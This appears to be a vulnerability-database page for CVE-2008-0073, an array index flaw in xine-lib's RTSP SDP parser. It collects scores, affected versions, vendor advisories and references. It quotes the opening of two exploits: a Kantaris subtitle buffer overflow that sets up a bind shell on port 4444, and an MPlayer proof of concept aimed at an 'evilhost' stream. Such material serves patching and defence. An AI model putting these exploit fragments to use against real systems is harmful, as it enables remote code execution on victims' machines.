CVE-2008-0073
published 2008-03-24CVE-2008-0073: Array index error in the sdpplin_parse function in input/libreal/sdpplin.c in xine-lib 1.1.10.1 allows remote RTSP servers to execute arbitrary code via a…
PriorityP342medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
9.17%
94.7th percentile
Array index error in the sdpplin_parse function in input/libreal/sdpplin.c in xine-lib 1.1.10.1 allows remote RTSP servers to execute arbitrary code via a large streamid SDP parameter.
Affected
6 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | vlc | < vlc 0.8.6.e-2 (bookworm) | vlc 0.8.6.e-2 (bookworm) |
| videolan | vlc_media_player | >= 0 < 0.8.6.e-2 | 0.8.6.e-2 |
| videolan | vlc_media_player | >= 0 < 0.8.6.e-2 | 0.8.6.e-2 |
| videolan | vlc_media_player | >= 0 < 0.8.6.e-2 | 0.8.6.e-2 |
| videolan | vlc_media_player | >= 0 < 0.8.6.e-2 | 0.8.6.e-2 |
| xine | xine-lib | — | — |
CVSS provenance
nvdv2.06.8MEDIUMAV:N/AC:M/Au:N/C:P/I:P/A:P
osv6.8MEDIUM
vendor_debian6.8MEDIUM
vendor_redhat6.8MEDIUM
vendor_ubuntu6.8MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Ubuntu
xine-lib vulnerabilities
vendor_ubuntu·2008-08-06·CVSS 6.8
CVE-2008-0073 [MEDIUM] xine-lib vulnerabilities
Title: xine-lib vulnerabilities
Summary: xine-lib vulnerabilities
Alin Rad Pop discovered an array index vulnerability in the SDP
parser. If a user or automated system were tricked into opening a
malicious RTSP stream, a remote attacker may be able to execute
arbitrary code with the privileges of the user invoking the program.
(CVE-2008-0073)
Luigi Auriemma discovered that xine-lib did not properly check
buffer sizes in the RTSP header-handling code. If xine-lib opened an
RTSP stream with crafted SDP attributes, a remote attacker may be
able to execute arbitrary code with the privileges of the user
invoking the program. (CVE-2008-0225, CVE-2008-0238)
Damian Frizza and Alfredo Ortega discovered that xine-lib did not
properly validate FLAC tags. If a user or automated system were
tricked
Debian
CVE-2008-0073: vlc - Array index error in the sdpplin_parse function in input/libreal/sdpplin.c in xi...
vendor_debian·2008·CVSS 6.8
CVE-2008-0073 [MEDIUM] CVE-2008-0073: vlc - Array index error in the sdpplin_parse function in input/libreal/sdpplin.c in xi...
Array index error in the sdpplin_parse function in input/libreal/sdpplin.c in xine-lib 1.1.10.1 allows remote RTSP servers to execute arbitrary code via a large streamid SDP parameter.
Scope: local
bookworm: resolved (fixed in 0.8.6.e-2)
bullseye: resolved (fixed in 0.8.6.e-2)
forky: resolved (fixed in 0.8.6.e-2)
sid: resolved (fixed in 0.8.6.e-2)
trixie: resolved (fixed in 0.8.6.e-2)
Red Hat
xine-lib: sdpplin_parse() Array Indexing Vulnerability
vendor_redhat·CVSS 6.8
CVE-2008-0073 [MEDIUM] xine-lib: sdpplin_parse() Array Indexing Vulnerability
xine-lib: sdpplin_parse() Array Indexing Vulnerability
Array index error in the sdpplin_parse function in input/libreal/sdpplin.c in xine-lib 1.1.10.1 allows remote RTSP servers to execute arbitrary code via a large streamid SDP parameter.
GHSA
GHSA-hpch-3whr-v22q: Array index error in the sdpplin_parse function in input/libreal/sdpplin
ghsa_unreviewed·2022-05-01
CVE-2008-0073 [MEDIUM] GHSA-hpch-3whr-v22q: Array index error in the sdpplin_parse function in input/libreal/sdpplin
Array index error in the sdpplin_parse function in input/libreal/sdpplin.c in xine-lib 1.1.10.1 allows remote RTSP servers to execute arbitrary code via a large streamid SDP parameter.
OSV
CVE-2008-0073: Array index error in the sdpplin_parse function in input/libreal/sdpplin
osv·2008-03-24·CVSS 6.8
CVE-2008-0073 [MEDIUM] CVE-2008-0073: Array index error in the sdpplin_parse function in input/libreal/sdpplin
Array index error in the sdpplin_parse function in input/libreal/sdpplin.c in xine-lib 1.1.10.1 allows remote RTSP servers to execute arbitrary code via a large streamid SDP parameter.
No detection rules found.
Exploit-DB
Kantaris 0.3.4 - SSA Subtitle Local Buffer Overflow
exploitdb·2008-04-25
CVE-2008-1769 Kantaris 0.3.4 - SSA Subtitle Local Buffer Overflow
Kantaris 0.3.4 - SSA Subtitle Local Buffer Overflow
---
#!/usr/bin/python
#
# Kantaris 0.3.4 Media Player Local Buffer Overflow [0day!]
#
# The following exploit will make a film.ssa file,
# just rename the file with the name of your movie, and use your imagination
# to pwn! :)
# Shellcode is local bind shell, just telnet to port:4444 to get command prompt :)
#
# BIG thanks to muts for helping
# and discovering a very interesting thing that we will publish soon
#
# I piss on your Business Networks course Igor Radusinovic! Go to hell!
#
# Vulnerability discovered by Muris Kurgas a.k.a. j0rgan
# jorganwd [at] gmail [dot] com
# http://www.jorgan.users.cg.yu
import os
jmp = '\xCC\x59\xFB\x77' # Windows XP sp1 JMP ESP, u can change it...
# win32_bind - EXITFUNC=seh LPORT=4444 Size=709 E
Exploit-DB
MPlayer 1.0 rc2 - 'sdpplin_parse()' Array Indexing Buffer Overflow (PoC)
exploitdb·2008-03-25·CVSS 6.8
CVE-2008-1558 [MEDIUM] MPlayer 1.0 rc2 - 'sdpplin_parse()' Array Indexing Buffer Overflow (PoC)
MPlayer 1.0 rc2 - 'sdpplin_parse()' Array Indexing Buffer Overflow (PoC)
---
#!/usr/bin/perl
# Huston, mplayer got some vulns! :(
# CVE-2008-0073 also apply to mplayer and vlc with some distinctions.
#
# Assuming kernel.va_randomize=0 this overwrite EIP with a "stream" structure on my box.
#
# The first element of the "stream" structure is a user-supplied buffer so it is not really useful to overwrite
# EIP, let's find the right target: we can overwrite every memory location beyond the desc->stream pointer and
# some before it.
#
# Vulnerable code:
# sdpplin_parse_stream()
# desc->stream_id=atoi(buf);
# spplin_parse()
# desc->stream[stream->stream_id]=stream;
#
# Test:
# - mplayer rtsp://evilhost/evil.rm
# eax 0xa0737008 // pointer to desc->stream
# edx 0x0495badd // "streamid" value
#
http://lists.opensuse.org/opensuse-security-announce/2008-03/msg00008.htmlhttp://lists.opensuse.org/opensuse-security-announce/2008-06/msg00001.htmlhttp://secunia.com/advisories/28694http://secunia.com/advisories/29392http://secunia.com/advisories/29472http://secunia.com/advisories/29503http://secunia.com/advisories/29578http://secunia.com/advisories/29601http://secunia.com/advisories/29740http://secunia.com/advisories/29766http://secunia.com/advisories/29800http://secunia.com/advisories/30581http://secunia.com/advisories/31372http://secunia.com/advisories/31393http://secunia.com/secunia_research/2008-10/http://security.gentoo.org/glsa/glsa-200804-25.xmlhttp://security.gentoo.org/glsa/glsa-200808-01.xmlhttp://sourceforge.net/project/shownotes.php?release_id=585488&group_id=9655http://wiki.videolan.org/Changelog/0.8.6fhttp://www.debian.org/security/2008/dsa-1536http://www.debian.org/security/2008/dsa-1543http://www.mandriva.com/security/advisories?name=MDVSA-2008:178http://www.mandriva.com/security/advisories?name=MDVSA-2008:219http://www.securityfocus.com/bid/28312http://www.securitytracker.com/id?1019682http://www.slackware.org/security/viewer.php?l=slackware-security&y=2008&m=slackware-security.392408http://www.ubuntu.com/usn/usn-635-1http://www.videolan.org/security/sa0803.phphttp://www.vupen.com/english/advisories/2008/0923http://www.vupen.com/english/advisories/2008/0985http://xinehq.de/index.php/newshttps://exchange.xforce.ibmcloud.com/vulnerabilities/41339https://www.redhat.com/archives/fedora-package-announce/2008-April/msg00143.htmlhttps://www.redhat.com/archives/fedora-package-announce/2008-March/msg00456.htmlhttp://lists.opensuse.org/opensuse-security-announce/2008-03/msg00008.htmlhttp://lists.opensuse.org/opensuse-security-announce/2008-06/msg00001.htmlhttp://secunia.com/advisories/28694http://secunia.com/advisories/29392http://secunia.com/advisories/29472http://secunia.com/advisories/29503http://secunia.com/advisories/29578http://secunia.com/advisories/29601http://secunia.com/advisories/29740http://secunia.com/advisories/29766http://secunia.com/advisories/29800http://secunia.com/advisories/30581http://secunia.com/advisories/31372http://secunia.com/advisories/31393http://secunia.com/secunia_research/2008-10/http://security.gentoo.org/glsa/glsa-200804-25.xmlhttp://security.gentoo.org/glsa/glsa-200808-01.xmlhttp://sourceforge.net/project/shownotes.php?release_id=585488&group_id=9655http://wiki.videolan.org/Changelog/0.8.6fhttp://www.debian.org/security/2008/dsa-1536http://www.debian.org/security/2008/dsa-1543http://www.mandriva.com/security/advisories?name=MDVSA-2008:178http://www.mandriva.com/security/advisories?name=MDVSA-2008:219http://www.securityfocus.com/bid/28312http://www.securitytracker.com/id?1019682http://www.slackware.org/security/viewer.php?l=slackware-security&y=2008&m=slackware-security.392408http://www.ubuntu.com/usn/usn-635-1http://www.videolan.org/security/sa0803.phphttp://www.vupen.com/english/advisories/2008/0923http://www.vupen.com/english/advisories/2008/0985http://xinehq.de/index.php/newshttps://exchange.xforce.ibmcloud.com/vulnerabilities/41339https://www.redhat.com/archives/fedora-package-announce/2008-April/msg00143.htmlhttps://www.redhat.com/archives/fedora-package-announce/2008-March/msg00456.html
2008-03-24
Published